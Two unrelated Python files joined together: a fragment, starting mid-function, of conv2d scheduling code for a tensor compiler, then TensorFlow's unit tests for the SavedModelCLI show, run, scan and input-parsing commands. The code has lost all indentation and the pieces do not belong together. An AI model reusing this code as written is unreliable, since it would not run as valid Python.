VH = sch.vh
VW = sch.vw
VC = sch.vc
ba = sch.ba
bc = sch.bc
CC = s.cache_write(conv_out, "global")
n, co, oh, ow, vh, vw, vc = s[conv_out].op.axis
s[conv_out].vectorize(vc)
s[CC].compute_at(s[conv_out], ow)
n, co, oh, ow, vh, vw, vc = s[CC].op.axis
ci, dh, dw, b1, b2 = s[CC].op.reduce_axis
s[CC].reorder(ci, dh, vh, dw, vw, b1, b2, vc)
s[CC].unroll(b1)
s[CC].unroll(b2)
s[CC].vectorize(vc)
##### Schedule A
if data_pad is not None:
s[data_pad].compute_inline()
_, h, _, _, _, _, vw = s[data_vec].op.axis
s[data_vec].vectorize(vw)
if ba == 1:
oaxis = h
paxis = h
else:
oh, ih = s[data_vec].split(h, ba)
oaxis = oh
paxis = ih
s[data_vec].parallel(paxis)
s[data_vec].pragma(oaxis, "parallel_launch_point")
s[data_vec].pragma(paxis, "parallel_stride_pattern")
s[data_vec].pragma(oaxis, "parallel_barrier_when_finish")
##### Schedule B
co, _, _, _, _, vc = s[kernel_vec].op.axis
s[kernel_vec].vectorize(vc)
if bc == 1:
oaxis = co
paxis = co
else:
oco, ico = s[kernel_vec].split(co, bc)
oaxis = oco
paxis = ico
s[kernel_vec].parallel(paxis)
s[kernel_vec].pragma(oaxis, "parallel_launch_point")
s[kernel_vec].pragma(paxis, "parallel_stride_pattern")
s[kernel_vec].pragma(oaxis, "parallel_barrier_when_finish")
##### Schedule C
n, co, h, w = s[last].op.axis
co, vc = s[last].split(co, VC)
oh, ow, vh, vw = s[last].tile(h, w, VH, VW)
s[last].reorder(n, co, oh, ow, vh, vw, vc)
if last != output:
s[output].compute_inline()
s[conv_out].compute_at(s[last], ow)
if bc == 1:
oaxis = co
paxis = co
else:
oco, ico = s[last].split(co, bc)
oaxis = oco
paxis = ico
s[last].parallel(paxis)
s[last].pragma(oaxis, "parallel_launch_point")
s[last].pragma(paxis, "parallel_stride_pattern")
s[last].pragma(oaxis, "parallel_barrier_when_finish")
return s
def _schedule_spatial_conv2d_nhwc(s, data, data_q, data_pad, data_vec,
kernel, kernel_q, kernel_vec,
conv_out, output, last):
# no stride and padding info here
_, IH, IW, CI, IB = data_q.shape
KH, KW, _, CO, KB = kernel_q.shape
_, OH, OW, _ = output.shape
# Infer padding and stride
if data_pad is None:
padding = (0, 0)
TH, TW = IH, IW
else:
_, TH, TW, _, _ = data_pad.shape
hpad = get_const_int((TH - IH) // 2)
wpad = get_const_int((TW - IW) // 2)
padding = (hpad, wpad)
hstride = get_const_int((TH - KH) // (OH - 1))
wstride = get_const_int((TW - KW) // (OW - 1))
stride = (hstride, wstride)
wkl = _get_workload(data, kernel, stride, padding, last.dtype, "NHWC")
sch = _get_schedule(wkl, "NHWC")
VH = sch.vh
VW = sch.vw
VC = sch.vc
ba = sch.ba
bc = sch.bc
##### Schedule data packing
if data_pad is not None:
s[data_pad].compute_inline()
_, h, _, _, _, _, _ = s[data_vec].op.axis
if ba == 1:
oaxis = h
paxis = h
else:
oh, ih = s[data_vec].split(h, ba)
oaxis = oh
paxis = ih
s[data_vec].parallel(paxis)
s[data_vec].pragma(oaxis, "parallel_launch_point")
s[data_vec].pragma(paxis, "parallel_stride_pattern")
s[data_vec].pragma(oaxis, "parallel_barrier_when_finish")
##### Schedule kernel packing
co, _, _, _, _, _ = s[kernel_vec].op.axis
if bc == 1:
oaxis = co
paxis = co
else:
oco, ico = s[kernel_vec].split(co, bc)
oaxis = oco
paxis = ico
s[kernel_vec].parallel(paxis)
s[kernel_vec].pragma(oaxis, "parallel_launch_point")
s[kernel_vec].pragma(paxis, "parallel_stride_pattern")
s[kernel_vec].pragma(oaxis, "parallel_barrier_when_finish")
##### Schedule Convolution
n, oh, ow, co, vh, vw, vc = s[conv_out].op.axis
dh, dw, ci, b1, b2 = s[conv_out].op.reduce_axis
s[conv_out].reorder(n, oh, ow, co, vh, vw, dh, dw, ci, vc, b1, b2)
s[conv_out].unroll(b1)
s[conv_out].unroll(b2)
s[conv_out].vectorize(vc)
# # Schedule output
n, h, w, co = s[last].op.axis
co, vc = s[last].split(co, VC)
oh, ow, vh, vw = s[last].tile(h, w, VH, VW)
s[last].reorder(n, oh, ow, co, vh, vw, vc)
s[last].vectorize(vc)
if last != output:
s[output].compute_inline()
s[conv_out].compute_at(s[last], ow)
if bc == 1:
oaxis = oh
paxis = oh
else:
oho, iho = s[last].split(oh, bc)
oaxis = oho
paxis = iho
s[last].parallel(paxis)
s[last].pragma(oaxis, "parallel_launch_point")
s[last].pragma(paxis, "parallel_stride_pattern")
s[last].pragma(oaxis, "parallel_barrier_when_finish")
return s
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SavedModelCLI tool."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import os
import pickle
import platform
import shutil
import sys
from absl.testing import parameterized
import numpy as np
from six import StringIO
from tensorflow.core.example import example_pb2
from tensorflow.core.framework import types_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.python.debug.wrappers import local_cli_wrapper
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_spec
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import save
from tensorflow.python.tools import saved_model_cli
from tensorflow.python.training.tracking import tracking
SAVED_MODEL_PATH = ('cc/saved_model/testdata/half_plus_two/00000123')
@contextlib.contextmanager
def captured_output():
new_out, new_err = StringIO(), StringIO()
old_out, old_err = sys.stdout, sys.stderr
try:
sys.stdout, sys.stderr = new_out, new_err
yield sys.stdout, sys.stderr
finally:
sys.stdout, sys.stderr = old_out, old_err
class SavedModelCLITestCase(test.TestCase, parameterized.TestCase):
def setUp(self):
super(SavedModelCLITestCase, self).setUp()
if platform.system() == 'Windows':
self.skipTest('Skipping failing tests on Windows.')
def testShowCommandAll(self):
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
self.parser = saved_model_cli.create_parser()
args = self.parser.parse_args(['show', '--dir', base_path, '--all'])
with captured_output() as (out, err):
saved_model_cli.show(args)
output = out.getvalue().strip()
# pylint: disable=line-too-long
exp_out = """MetaGraphDef with tag-set: 'serve' contains the following SignatureDefs:
signature_def['classify_x2_to_y3']:
The given SavedModel SignatureDef contains the following input(s):
inputs['inputs'] tensor_info:
dtype: DT_FLOAT
shape: (-1, 1)
name: x2:0
The given SavedModel SignatureDef contains the following output(s):
outputs['scores'] tensor_info:
dtype: DT_FLOAT
shape: (-1, 1)
name: y3:0
Method name is: tensorflow/serving/classify
signature_def['classify_x_to_y']:
The given SavedModel SignatureDef contains the following input(s):
inputs['inputs'] tensor_info:
dtype: DT_STRING
shape: unknown_rank
name: tf_example:0
The given SavedModel SignatureDef contains the following output(s):
outputs['scores'] tensor_info:
dtype: DT_FLOAT
shape: (-1, 1)
name: y:0
Method name is: tensorflow/serving/classify
signature_def['regress_x2_to_y3']:
The given SavedModel SignatureDef contains the following input(s):
inputs['inputs'] tensor_info:
dtype: DT_FLOAT
shape: (-1, 1)
name: x2:0
The given SavedModel SignatureDef contains the following output(s):
outputs['outputs'] tensor_info:
dtype: DT_FLOAT
shape: (-1, 1)
name: y3:0
Method name is: tensorflow/serving/regress
signature_def['regress_x_to_y']:
The given SavedModel SignatureDef contains the following input(s):
inputs['inputs'] tensor_info:
dtype: DT_STRING
shape: unknown_rank
name: tf_example:0
The given SavedModel SignatureDef contains the following output(s):
outputs['outputs'] tensor_info:
dtype: DT_FLOAT
shape: (-1, 1)
name: y:0
Method name is: tensorflow/serving/regress
signature_def['regress_x_to_y2']:
The given SavedModel SignatureDef contains the following input(s):
inputs['inputs'] tensor_info:
dtype: DT_STRING
shape: unknown_rank
name: tf_example:0
The given SavedModel SignatureDef contains the following output(s):
outputs['outputs'] tensor_info:
dtype: DT_FLOAT
shape: (-1, 1)
name: y2:0
Method name is: tensorflow/serving/regress
signature_def['serving_default']:
The given SavedModel SignatureDef contains the following input(s):
inputs['x'] tensor_info:
dtype: DT_FLOAT
shape: (-1, 1)
name: x:0
The given SavedModel SignatureDef contains the following output(s):
outputs['y'] tensor_info:
dtype: DT_FLOAT
shape: (-1, 1)
name: y:0
Method name is: tensorflow/serving/predict"""
# pylint: enable=line-too-long
self.maxDiff = None # Produce a useful error msg if the comparison fails
self.assertMultiLineEqual(output, exp_out)
self.assertEqual(err.getvalue().strip(), '')
def testShowAllWithFunctions(self):
class DummyModel(tracking.AutoTrackable):
"""Model with callable polymorphic functions specified."""
@def_function.function
def func1(self, a, b, c):
if c:
return a + b
else:
return a * b
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=(2, 2), dtype=dtypes.float32)
])
def func2(self, x):
return x + 2
@def_function.function
def __call__(self, y, c=7):
return y + 2 * c
saved_model_dir = os.path.join(test.get_temp_dir(), 'dummy_model')
dummy_model = DummyModel()
# Call with specific values to create new polymorphic function traces.
dummy_model.func1(constant_op.constant(5), constant_op.constant(9), True)
dummy_model(constant_op.constant(5))
save.save(dummy_model, saved_model_dir)
self.parser = saved_model_cli.create_parser()
args = self.parser.parse_args(['show', '--dir', saved_model_dir, '--all'])
with captured_output() as (out, err):
saved_model_cli.show(args)
output = out.getvalue().strip()
exp_out = """MetaGraphDef with tag-set: 'serve' contains the following SignatureDefs:
signature_def['__saved_model_init_op']:
The given SavedModel SignatureDef contains the following input(s):
The given SavedModel SignatureDef contains the following output(s):
outputs['__saved_model_init_op'] tensor_info:
dtype: DT_INVALID
shape: unknown_rank
name: NoOp
Method name is:
signature_def['serving_default']:
The given SavedModel SignatureDef contains the following input(s):
inputs['x'] tensor_info:
dtype: DT_FLOAT
shape: (2, 2)
name: serving_default_x:0
The given SavedModel SignatureDef contains the following output(s):
outputs['output_0'] tensor_info:
dtype: DT_FLOAT
shape: (2, 2)
name: PartitionedCall:0
Method name is: tensorflow/serving/predict
Defined Functions:
Function Name: '__call__'
Option #1
Callable with:
Argument #1
y: TensorSpec(shape=(), dtype=tf.int32, name='y')
Argument #2
DType: int
Value: 7
Function Name: 'func1'
Option #1
Callable with:
Argument #1
a: TensorSpec(shape=(), dtype=tf.int32, name='a')
Argument #2
b: TensorSpec(shape=(), dtype=tf.int32, name='b')
Argument #3
DType: bool
Value: True
Function Name: 'func2'
Option #1
Callable with:
Argument #1
x: TensorSpec(shape=(2, 2), dtype=tf.float32, name='x')
""".strip() # pylint: enable=line-too-long
self.maxDiff = None # Produce a useful error msg if the comparison fails
self.assertMultiLineEqual(output, exp_out)
self.assertEqual(err.getvalue().strip(), '')
def testShowAllWithPureConcreteFunction(self):
class DummyModel(tracking.AutoTrackable):
"""Model with a callable concrete function."""
def __init__(self):
function = def_function.function(
self.multiply,
input_signature=[
tensor_spec.TensorSpec(shape=(), dtype=dtypes.float32),
tensor_spec.TensorSpec(shape=(), dtype=dtypes.float32)
])
self.pure_concrete_function = function.get_concrete_function()
super(DummyModel, self).__init__()
def multiply(self, a, b):
return a * b
saved_model_dir = os.path.join(test.get_temp_dir(), 'dummy_model')
dummy_model = DummyModel()
save.save(dummy_model, saved_model_dir)
self.parser = saved_model_cli.create_parser()
args = self.parser.parse_args(['show', '--dir', saved_model_dir, '--all'])
with captured_output() as (out, err):
saved_model_cli.show(args)
output = out.getvalue().strip()
exp_out = """MetaGraphDef with tag-set: 'serve' contains the following SignatureDefs:
signature_def['__saved_model_init_op']:
The given SavedModel SignatureDef contains the following input(s):
The given SavedModel SignatureDef contains the following output(s):
outputs['__saved_model_init_op'] tensor_info:
dtype: DT_INVALID
shape: unknown_rank
name: NoOp
Method name is:
signature_def['serving_default']:
The given SavedModel SignatureDef contains the following input(s):
inputs['a'] tensor_info:
dtype: DT_FLOAT
shape: ()
name: serving_default_a:0
inputs['b'] tensor_info:
dtype: DT_FLOAT
shape: ()
name: serving_default_b:0
The given SavedModel SignatureDef contains the following output(s):
outputs['output_0'] tensor_info:
dtype: DT_FLOAT
shape: ()
name: PartitionedCall:0
Method name is: tensorflow/serving/predict
Defined Functions:
Function Name: 'pure_concrete_function'
Option #1
Callable with:
Argument #1
a: TensorSpec(shape=(), dtype=tf.float32, name='a')
Argument #2
b: TensorSpec(shape=(), dtype=tf.float32, name='b')
""".strip() # pylint: enable=line-too-long
self.maxDiff = None # Produce a useful error msg if the comparison fails
self.assertMultiLineEqual(output, exp_out)
self.assertEqual(err.getvalue().strip(), '')
def testShowCommandTags(self):
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
self.parser = saved_model_cli.create_parser()
args = self.parser.parse_args(['show', '--dir', base_path])
with captured_output() as (out, err):
saved_model_cli.show(args)
output = out.getvalue().strip()
exp_out = 'The given SavedModel contains the following tag-sets:\n\'serve\''
self.assertMultiLineEqual(output, exp_out)
self.assertEqual(err.getvalue().strip(), '')
def testShowCommandSignature(self):
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
self.parser = saved_model_cli.create_parser()
args = self.parser.parse_args(
['show', '--dir', base_path, '--tag_set', 'serve'])
with captured_output() as (out, err):
saved_model_cli.show(args)
output = out.getvalue().strip()
exp_header = ('The given SavedModel MetaGraphDef contains SignatureDefs '
'with the following keys:')
exp_start = 'SignatureDef key: '
exp_keys = [
'"classify_x2_to_y3"', '"classify_x_to_y"', '"regress_x2_to_y3"',
'"regress_x_to_y"', '"regress_x_to_y2"', '"serving_default"'
]
# Order of signatures does not matter
self.assertMultiLineEqual(
output,
'\n'.join([exp_header] + [exp_start + exp_key for exp_key in exp_keys]))
self.assertEqual(err.getvalue().strip(), '')
def testShowCommandErrorNoTagSet(self):
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
self.parser = saved_model_cli.create_parser()
args = self.parser.parse_args(
['show', '--dir', base_path, '--tag_set', 'badtagset'])
with self.assertRaises(RuntimeError):
saved_model_cli.show(args)
def testShowCommandInputsOutputs(self):
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
self.parser = saved_model_cli.create_parser()
args = self.parser.parse_args([
'show', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
'serving_default'
])
with captured_output() as (out, err):
saved_model_cli.show(args)
output = out.getvalue().strip()
expected_output = (
'The given SavedModel SignatureDef contains the following input(s):\n'
' inputs[\'x\'] tensor_info:\n'
' dtype: DT_FLOAT\n shape: (-1, 1)\n name: x:0\n'
'The given SavedModel SignatureDef contains the following output(s):\n'
' outputs[\'y\'] tensor_info:\n'
' dtype: DT_FLOAT\n shape: (-1, 1)\n name: y:0\n'
'Method name is: tensorflow/serving/predict')
self.assertEqual(output, expected_output)
self.assertEqual(err.getvalue().strip(), '')
def testPrintREFTypeTensor(self):
ref_tensor_info = meta_graph_pb2.TensorInfo()
ref_tensor_info.dtype = types_pb2.DT_FLOAT_REF
with captured_output() as (out, err):
saved_model_cli._print_tensor_info(ref_tensor_info)
self.assertTrue('DT_FLOAT_REF' in out.getvalue().strip())
self.assertEqual(err.getvalue().strip(), '')
def testInputPreProcessFormats(self):
input_str = 'input1=/path/file.txt[ab3];input2=file2'
input_expr_str = 'input3=np.zeros([2,2]);input4=[4,5]'
input_dict = saved_model_cli.preprocess_inputs_arg_string(input_str)
input_expr_dict = saved_model_cli.preprocess_input_exprs_arg_string(
input_expr_str)
self.assertTrue(input_dict['input1'] == ('/path/file.txt', 'ab3'))
self.assertTrue(input_dict['input2'] == ('file2', None))
print(input_expr_dict['input3'])
self.assertAllClose(input_expr_dict['input3'], np.zeros([2, 2]))
self.assertAllClose(input_expr_dict['input4'], [4, 5])
self.assertTrue(len(input_dict) == 2)
self.assertTrue(len(input_expr_dict) == 2)
def testInputPreProcessExamplesWithStrAndBytes(self):
input_examples_str = 'inputs=[{"text":["foo"], "bytes":[b"bar"]}]'
input_dict = saved_model_cli.preprocess_input_examples_arg_string(
input_examples_str)
feature = example_pb2.Example.FromString(input_dict['inputs'][0])
self.assertProtoEquals(
"""
features {
feature {
key: "bytes"
value {
bytes_list {
value: "bar"
}
}
}
feature {
key: "text"
value {
bytes_list {
value: "foo"
}
}
}
}
""", feature)
def testInputPreProcessFileNames(self):
input_str = (r'inputx=C:\Program Files\data.npz[v:0];'
r'input:0=c:\PROGRA~1\data.npy')
input_dict = saved_model_cli.preprocess_inputs_arg_string(input_str)
self.assertTrue(input_dict['inputx'] == (r'C:\Program Files\data.npz',
'v:0'))
self.assertTrue(input_dict['input:0'] == (r'c:\PROGRA~1\data.npy', None))
def testInputPreProcessErrorBadFormat(self):
input_str = 'inputx=file[[v1]v2'
with self.assertRaises(RuntimeError):
saved_model_cli.preprocess_inputs_arg_string(input_str)
input_str = 'inputx:file'
with self.assertRaises(RuntimeError):
saved_model_cli.preprocess_inputs_arg_string(input_str)
input_str = 'inputx:np.zeros((5))'
with self.assertRaises(RuntimeError):
saved_model_cli.preprocess_input_exprs_arg_string(input_str)
def testInputParserNPY(self):
x0 = np.array([[1], [2]])
x1 = np.array(range(6)).reshape(2, 3)
input0_path = os.path.join(test.get_temp_dir(), 'input0.npy')
input1_path = os.path.join(test.get_temp_dir(), 'input1.npy')
np.save(input0_path, x0)
np.save(input1_path, x1)
input_str = 'x0=' + input0_path + '[x0];x1=' + input1_path
feed_dict = saved_model_cli.load_inputs_from_input_arg_string(
input_str, '', '')
self.assertTrue(np.all(feed_dict['x0'] == x0))
self.assertTrue(np.all(feed_dict['x1'] == x1))
def testInputParserNPZ(self):
x0 = np.array([[1], [2]])
input_path = os.path.join(test.get_temp_dir(), 'input.npz')
np.savez(input_path, a=x0)
input_str = 'x=' + input_path + '[a];y=' + input_path
feed_dict = saved_model_cli.load_inputs_from_input_arg_string(
input_str, '', '')
self.assertTrue(np.all(feed_dict['x'] == x0))
self.assertTrue(np.all(feed_dict['y'] == x0))
def testInputParserPickle(self):
pkl0 = {'a': 5, 'b': np.array(range(4))}
pkl1 = np.array([1])
pkl2 = np.array([[1], [3]])
input_path0 = os.path.join(test.get_temp_dir(), 'pickle0.pkl')
input_path1 = os.path.join(test.get_temp_dir(), 'pickle1.pkl')
input_path2 = os.path.join(test.get_temp_dir(), 'pickle2.pkl')
with open(input_path0, 'wb') as f:
pickle.dump(pkl0, f)
with open(input_path1, 'wb') as f:
pickle.dump(pkl1, f)
with open(input_path2, 'wb') as f:
pickle.dump(pkl2, f)
input_str = 'x=' + input_path0 + '[b];y=' + input_path1 + '[c];'
input_str += 'z=' + input_path2
feed_dict = saved_model_cli.load_inputs_from_input_arg_string(
input_str, '', '')
self.assertTrue(np.all(feed_dict['x'] == pkl0['b']))
self.assertTrue(np.all(feed_dict['y'] == pkl1))
self.assertTrue(np.all(feed_dict['z'] == pkl2))
def testInputParserPythonExpression(self):
x1 = np.ones([2, 10])
x2 = np.array([[1], [2], [3]])
x3 = np.mgrid[0:5, 0:5]
x4 = [[3], [4]]
input_expr_str = ('x1=np.ones([2,10]);x2=np.array([[1],[2],[3]]);'
'x3=np.mgrid[0:5,0:5];x4=[[3],[4]]')
feed_dict = saved_model_cli.load_inputs_from_input_arg_string(
'', input_expr_str, '')
self.assertTrue(np.all(feed_dict['x1'] == x1))
self.assertTrue(np.all(feed_dict['x2'] == x2))
self.assertTrue(np.all(feed_dict['x3'] == x3))
self.assertTrue(np.all(feed_dict['x4'] == x4))
def testInputParserBoth(self):
x0 = np.array([[1], [2]])
input_path = os.path.join(test.get_temp_dir(), 'input.npz')
np.savez(input_path, a=x0)
x1 = np.ones([2, 10])
input_str = 'x0=' + input_path + '[a]'
input_expr_str = 'x1=np.ones([2,10])'
feed_dict = saved_model_cli.load_inputs_from_input_arg_string(
input_str, input_expr_str, '')
self.assertTrue(np.all(feed_dict['x0'] == x0))
self.assertTrue(np.all(feed_dict['x1'] == x1))
def testInputParserBothDuplicate(self):
x0 = np.array([[1], [2]])
input_path = os.path.join(test.get_temp_dir(), 'input.npz')
np.savez(input_path, a=x0)
x1 = np.ones([2, 10])
input_str = 'x0=' + input_path + '[a]'
input_expr_str = 'x0=np.ones([2,10])'
feed_dict = saved_model_cli.load_inputs_from_input_arg_string(
input_str, input_expr_str, '')
self.assertTrue(np.all(feed_dict['x0'] == x1))
def testInputParserErrorNoName(self):
x0 = np.array([[1], [2]])
x1 = np.array(range(5))
input_path = os.path.join(test.get_temp_dir(), 'input.npz')
np.savez(input_path, a=x0, b=x1)
input_str = 'x=' + input_path
with self.assertRaises(RuntimeError):
saved_model_cli.load_inputs_from_input_arg_string(input_str, '', '')
def testInputParserErrorWrongName(self):
x0 = np.array([[1], [2]])
x1 = np.array(range(5))
input_path = os.path.join(test.get_temp_dir(), 'input.npz')
np.savez(input_path, a=x0, b=x1)
input_str = 'x=' + input_path + '[c]'
with self.assertRaises(RuntimeError):
saved_model_cli.load_inputs_from_input_arg_string(input_str, '', '')
def testRunCommandInputExamples(self):
self.parser = saved_model_cli.create_parser()
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
output_dir = os.path.join(test.get_temp_dir(), 'new_dir')
args = self.parser.parse_args([
'run', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
'regress_x_to_y', '--input_examples',
'inputs=[{"x":[8.0],"x2":[5.0]}, {"x":[4.0],"x2":[3.0]}]', '--outdir',
output_dir
])
saved_model_cli.run(args)
y_actual = np.load(os.path.join(output_dir, 'outputs.npy'))
y_expected = np.array([[6.0], [4.0]])
self.assertAllEqual(y_expected, y_actual)
def testRunCommandExistingOutdir(self):
self.parser = saved_model_cli.create_parser()
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
x = np.array([[1], [2]])
x_notused = np.zeros((6, 3))
input_path = os.path.join(test.get_temp_dir(), 'testRunCommand_inputs.npz')
np.savez(input_path, x0=x, x1=x_notused)
output_file = os.path.join(test.get_temp_dir(), 'outputs.npy')
if os.path.exists(output_file):
os.remove(output_file)
args = self.parser.parse_args([
'run', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
'regress_x2_to_y3', '--inputs', 'inputs=' + input_path + '[x0]',
'--outdir',
test.get_temp_dir()
])
saved_model_cli.run(args)
y_actual = np.load(output_file)
y_expected = np.array([[3.5], [4.0]])
self.assertAllClose(y_expected, y_actual)
def testRunCommandNewOutdir(self):
self.parser = saved_model_cli.create_parser()
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
x = np.array([[1], [2]])
x_notused = np.zeros((6, 3))
input_path = os.path.join(test.get_temp_dir(),
'testRunCommandNewOutdir_inputs.npz')
output_dir = os.path.join(test.get_temp_dir(), 'new_dir')
if os.path.isdir(output_dir):
shutil.rmtree(output_dir)
np.savez(input_path, x0=x, x1=x_notused)
args = self.parser.parse_args([
'run', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
'serving_default', '--inputs', 'x=' + input_path + '[x0]', '--outdir',
output_dir
])
saved_model_cli.run(args)
y_actual = np.load(os.path.join(output_dir, 'y.npy'))
y_expected = np.array([[2.5], [3.0]])
self.assertAllClose(y_expected, y_actual)
def testRunCommandOutOverwrite(self):
self.parser = saved_model_cli.create_parser()
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
x = np.array([[1], [2]])
x_notused = np.zeros((6, 3))
input_path = os.path.join(test.get_temp_dir(),
'testRunCommandOutOverwrite_inputs.npz')
np.savez(input_path, x0=x, x1=x_notused)
output_file = os.path.join(test.get_temp_dir(), 'y.npy')
open(output_file, 'a').close()
args = self.parser.parse_args([
'run', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
'serving_default', '--inputs', 'x=' + input_path + '[x0]', '--outdir',
test.get_temp_dir(), '--overwrite'
])
saved_model_cli.run(args)
y_actual = np.load(output_file)
y_expected = np.array([[2.5], [3.0]])
self.assertAllClose(y_expected, y_actual)
def testRunCommandInvalidInputKeyError(self):
self.parser = saved_model_cli.create_parser()
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
args = self.parser.parse_args([
'run', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
'regress_x2_to_y3', '--input_exprs', 'x2=np.ones((3,1))'
])
with self.assertRaises(ValueError):
saved_model_cli.run(args)
def testRunCommandInvalidSignature(self):
self.parser = saved_model_cli.create_parser()
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
args = self.parser.parse_args([
'run', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
'INVALID_SIGNATURE', '--input_exprs', 'x2=np.ones((3,1))'
])
with self.assertRaisesRegex(ValueError,
'Could not find signature "INVALID_SIGNATURE"'):
saved_model_cli.run(args)
def testRunCommandInputExamplesNotListError(self):
self.parser = saved_model_cli.create_parser()
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
output_dir = os.path.join(test.get_temp_dir(), 'new_dir')
args = self.parser.parse_args([
'run', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
'regress_x_to_y', '--input_examples', 'inputs={"x":8.0,"x2":5.0}',
'--outdir', output_dir
])
with self.assertRaisesRegex(ValueError, 'must be a list'):
saved_model_cli.run(args)
def testRunCommandInputExamplesFeatureValueNotListError(self):
self.parser = saved_model_cli.create_parser()
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
output_dir = os.path.join(test.get_temp_dir(), 'new_dir')
args = self.parser.parse_args([
'run', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
'regress_x_to_y', '--input_examples', 'inputs=[{"x":8.0,"x2":5.0}]',
'--outdir', output_dir
])
with self.assertRaisesRegex(ValueError, 'feature value must be a list'):
saved_model_cli.run(args)
def testRunCommandInputExamplesFeatureBadType(self):
self.parser = saved_model_cli.create_parser()
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
output_dir = os.path.join(test.get_temp_dir(), 'new_dir')
args = self.parser.parse_args([
'run', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
'regress_x_to_y', '--input_examples', 'inputs=[{"x":[[1],[2]]}]',
'--outdir', output_dir
])
with self.assertRaisesRegex(ValueError, 'is not supported'):
saved_model_cli.run(args)
def testRunCommandOutputFileExistError(self):
self.parser = saved_model_cli.create_parser()
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
x = np.array([[1], [2]])
x_notused = np.zeros((6, 3))
input_path = os.path.join(test.get_temp_dir(),
'testRunCommandOutOverwrite_inputs.npz')
np.savez(input_path, x0=x, x1=x_notused)
output_file = os.path.join(test.get_temp_dir(), 'y.npy')
open(output_file, 'a').close()
args = self.parser.parse_args([
'run', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
'serving_default', '--inputs', 'x=' + input_path + '[x0]', '--outdir',
test.get_temp_dir()
])
with self.assertRaises(RuntimeError):
saved_model_cli.run(args)
def testRunCommandInputNotGivenError(self):
self.parser = saved_model_cli.create_parser()
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
args = self.parser.parse_args([
'run', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
'serving_default'
])
with self.assertRaises(AttributeError):
saved_model_cli.run(args)
def testRunCommandWithDebuggerEnabled(self):
self.parser = saved_model_cli.create_parser()
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
x = np.array([[1], [2]])
x_notused = np.zeros((6, 3))
input_path = os.path.join(test.get_temp_dir(),
'testRunCommandNewOutdir_inputs.npz')
output_dir = os.path.join(test.get_temp_dir(), 'new_dir')
if os.path.isdir(output_dir):
shutil.rmtree(output_dir)
np.savez(input_path, x0=x, x1=x_notused)
args = self.parser.parse_args([
'run', '--dir', base_path, '--tag_set', 'serve', '--signature_def',
'serving_default', '--inputs', 'x=' + input_path + '[x0]', '--outdir',
output_dir, '--tf_debug'
])
def fake_wrapper_session(sess):
return sess
with test.mock.patch.object(
local_cli_wrapper,
'LocalCLIDebugWrapperSession',
side_effect=fake_wrapper_session,
autospec=True) as fake:
saved_model_cli.run(args)
fake.assert_called_with(test.mock.ANY)
y_actual = np.load(os.path.join(output_dir, 'y.npy'))
y_expected = np.array([[2.5], [3.0]])
self.assertAllClose(y_expected, y_actual)
def testScanCommand(self):
self.parser = saved_model_cli.create_parser()
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
args = self.parser.parse_args(['scan', '--dir', base_path])
with captured_output() as (out, _):
saved_model_cli.scan(args)
output = out.getvalue().strip()
self.assertTrue('does not contain denylisted ops' in output)
def testScanCommandFoundDenylistedOp(self):
self.parser = saved_model_cli.create_parser()
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
args = self.parser.parse_args(
['scan', '--dir', base_path, '--tag_set', 'serve'])
op_denylist = saved_model_cli._OP_DENYLIST
saved_model_cli._OP_DENYLIST = set(['VariableV2'])
with captured_output() as (out, _):
saved_model_cli.scan(args)
saved_model_cli._OP_DENYLIST = op_denylist
output = out.getvalue().strip()
self.assertTrue('\'VariableV2\'' in output)
def testAOTCompileCPUWrongSignatureDefKey(self):
if not test.is_built_with_xla():
self.skipTest('Skipping test because XLA is not compiled in.')
self.parser = saved_model_cli.create_parser()
base_path = test.test_src_dir_path(SAVED_MODEL_PATH)
output_dir = os.path.join(test.get_temp_dir(), 'aot_compile_cpu_dir')
args = self.parser.parse_args([
'aot_compile_cpu', '--dir', base_path, '--tag_set', 'serve',
'--output_prefix', output_dir, '--cpp_class', 'Compiled',
'--signature_def_key', 'MISSING'
])
with self.assertRaisesRegex(ValueError, 'Unable to find signature_def'):
saved_model_cli.aot_compile_cpu(args)
